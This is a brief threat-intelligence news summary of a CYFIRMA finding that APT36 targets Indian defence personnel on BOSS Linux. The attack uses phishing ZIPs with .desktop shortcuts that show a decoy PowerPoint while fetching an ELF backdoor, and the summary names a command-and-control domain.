CYFIRMA has uncovered a sophisticated cyber-espionage campaign orchestrated by the Pakistan-based threat actor APT36 (aka Transparent Tribe) targeting personnel in India’s defense sector.
More recently, APT36 has shifted its focus to Linux-based environments, particularly targeting systems running BOSS Linux, a distribution widely deployed across Indian government agencies.
The attack chain begins with a phishing email with a ZIP file attachment. The file comes with a Linux shortcut (.desktop file) that contains a series of commands. When executed, the file triggers a two-stage process: it opens a legitimate PowerPoint presentation to maintain a sense of authenticity, while downloading and running a malicious ELF (Executable and Linkable Format) binary in the background.
The malware, named BOSS.elf and saved locally as client.elf, acts as the primary payload, granting attackers unauthorized and persistent access to compromised systems.
Further investigation has identified a domain named sorlastore.com and linked it to the observed campaign. Threat intelligence suggests that the domain and its subdomains have been actively used by APT36 to deliver payloads and maintain command-and-control communication channels during targeted intrusions.